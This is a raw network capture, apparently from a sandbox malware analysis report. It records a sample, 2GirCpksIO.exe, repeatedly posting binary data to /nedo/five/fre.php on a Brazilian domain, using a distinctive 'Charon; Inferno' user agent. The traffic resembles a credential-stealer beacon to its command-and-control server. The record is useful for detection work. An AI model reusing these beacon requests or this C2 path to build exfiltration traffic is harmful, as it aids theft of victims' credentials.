                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                402192.168.11.2050189192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                403192.168.11.2050190192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                404192.168.11.2050191192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                405192.168.11.2050192192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                406192.168.11.2050193192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                407192.168.11.2050194192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                408192.168.11.2050195192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                409192.168.11.2050196192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                41192.168.11.2049828192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:44.781908035 CET368OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:45.068665028 CET369INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:44 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                410192.168.11.2050197192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                411192.168.11.2050198192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                412192.168.11.2050199192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                413192.168.11.2050200192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                414192.168.11.2050201192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                415192.168.11.2050202192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                416192.168.11.2050203192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                417192.168.11.2050204192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                418192.168.11.2050205192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                419192.168.11.2050206192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                42192.168.11.2049829192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:45.550425053 CET369OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:45.870554924 CET370INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:45 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                420192.168.11.2050207192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                421192.168.11.2050208192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                422192.168.11.2050209192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                423192.168.11.2050210192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                424192.168.11.2050211192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                425192.168.11.2050212192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                426192.168.11.2050213192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                427192.168.11.2050214192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                428192.168.11.2050215192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                429192.168.11.2050216192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                43192.168.11.2049830192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:46.388341904 CET371OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:46.679601908 CET371INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:46 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                430192.168.11.2050217192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                431192.168.11.2050218192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                432192.168.11.2050219192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                433192.168.11.2050220192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                434192.168.11.2050221192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                435192.168.11.2050222192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                436192.168.11.2050223192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                437192.168.11.2050224192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                438192.168.11.2050225192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                439192.168.11.2050226192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                44192.168.11.2049831192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:47.208873987 CET372OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:47.578627110 CET372INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:47 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                440192.168.11.2050227192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                441192.168.11.2050228192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                442192.168.11.2050229192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                443192.168.11.2050230192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                444192.168.11.2050231192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                445192.168.11.2050232192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                446192.168.11.2050233192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                447192.168.11.2050234192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                448192.168.11.2050235192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                449192.168.11.2050236192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                45192.168.11.2049832192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:48.089770079 CET373OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:48.392205000 CET374INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:48 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                450192.168.11.2050237192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                451192.168.11.2050238192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                452192.168.11.2050239192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                453192.168.11.2050240192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                454192.168.11.2050241192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                455192.168.11.2050242192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                456192.168.11.2050243192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                457192.168.11.2050244192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                458192.168.11.2050245192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                459192.168.11.2050246192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                46192.168.11.2049833192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:48.907541037 CET374OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:49.221297979 CET375INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:48 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                460192.168.11.2050247192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                461192.168.11.2050248192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                462192.168.11.2050249192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                463192.168.11.2050250192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                464192.168.11.2050251192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                465192.168.11.2050252192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                466192.168.11.2050253192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                467192.168.11.2050254192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                468192.168.11.2050255192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                469192.168.11.2050256192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                47192.168.11.2049834192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:49.746555090 CET376OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:50.056238890 CET376INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:49 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                470192.168.11.2050257192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                471192.168.11.2050258192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                472192.168.11.2050259192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                473192.168.11.2050260192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                474192.168.11.2050261192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                475192.168.11.2050262192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                476192.168.11.2050263192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                477192.168.11.2050264192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                478192.168.11.2050265192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                479192.168.11.2050266192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                48192.168.11.2049835192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:50.586189985 CET377OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:50.897164106 CET377INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:50 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                480192.168.11.2050267192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                481192.168.11.2050268192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                482192.168.11.2050269192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                483192.168.11.2050270192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                484192.168.11.2050271192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                485192.168.11.2050272192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                486192.168.11.2050273192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                487192.168.11.2050274192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                488192.168.11.2050275192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                489192.168.11.2050276192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                49192.168.11.2049836192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:51.421232939 CET378OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:51.711165905 CET379INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:51 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                490192.168.11.2050277192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                491192.168.11.2050278192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                5192.168.11.2049792192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:10.753878117 CET321OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:11.076780081 CET322INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:10 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                50192.168.11.2049837192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:52.227112055 CET379OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:52.547043085 CET380INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:52 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                51192.168.11.2049838192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:53.057143927 CET381OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:53.349915981 CET381INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:53 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                52192.168.11.2049839192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:53.809156895 CET382OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:54.101151943 CET382INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:53 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                53192.168.11.2049840192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:54.636790991 CET383OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:54.950619936 CET384INHTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:54 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                54192.168.11.2049841192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData
                                Nov 22, 2021 15:29:55.476605892 CET384OUTPOST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
